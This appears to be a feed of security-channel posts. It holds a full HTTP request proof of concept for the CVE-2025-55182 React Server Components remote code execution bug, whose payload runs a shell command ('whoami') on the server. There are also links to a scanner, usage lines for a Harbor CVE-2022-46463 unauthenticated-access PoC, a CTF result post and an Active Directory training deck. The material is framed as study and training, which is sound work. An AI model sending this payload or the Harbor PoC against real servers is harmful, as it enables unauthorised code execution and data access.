React2Shell Ultimate - The most comprehensive CVE-2025-66478 Scanner for Next.js RSC RCE vulnerability. Multi-mode detection, WAF bypass, local scanning.
https://github.com/hackersatyamrastogi/react2shell-ultimate
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3#file-cve-2025-55182-http
There is an Active Detection Template for CVE-2025-55182. You can find this vuln with your Nuclei. For this you must add the .yaml POC to your Nuclei!
CVE-2025-55182 React Server Components RCE POC
POC:
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 744
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('whoami',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
In the field of cybersecurity, it is essential to continuously study publicly available exploits or vulnerabilities discovered in certain technologies. You can learn how to use the latest emerging exploits through the "recent-threats" module available on TryHackMe at https://tryhackme.com/module/recent-threats . I hope this will be useful for you!
#tryhackme #pentest #cybersecurity #CVE
Forwarded from Turan Security
🏆 12th place in the BlackHat MEA 2025 CTF competition!
☠️ The team defending the honor of Turan Security and 🇺🇿 Uzbekistan placed in the TOP 12 among 125 teams at one of the world's most prestigious cybersecurity competitions!
The BlackHat MEA event, held in Riyadh, Saudi Arabia, is an arena where the strongest specialists, experts and the world's leading cybersecurity teams meet on a global scale.
Among the TOP teams, on 3 high-difficulty tasks our team lead:
🚩Firstblood - web, first;
🚩Firstblood - forensics, first;
🚩Secondblood - web, managed to find the flag second.
Our goal is to raise Uzbekistan's standing on the international stage, inspire young people, and contribute to the development of the cybersecurity field.
Forwarded from Private Shizo
CVE-2022-46463.zip
2.9 KB
💥PoC for CVE-2022-46463
An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication.
Usage:
python3 cve-2022-46463.py -u TargetURL
python3 cve-2022-46463.py -f targetListUrlFile
Forwarded from Ombor
Active Directory Hujum va Himoya.pptx
10.4 MB
#ActiveDirectory
#CRTE
#CRTP
And finally it is done. I must admit this is not a perfect guide, but it is better than nothing. I wish you patience in reading...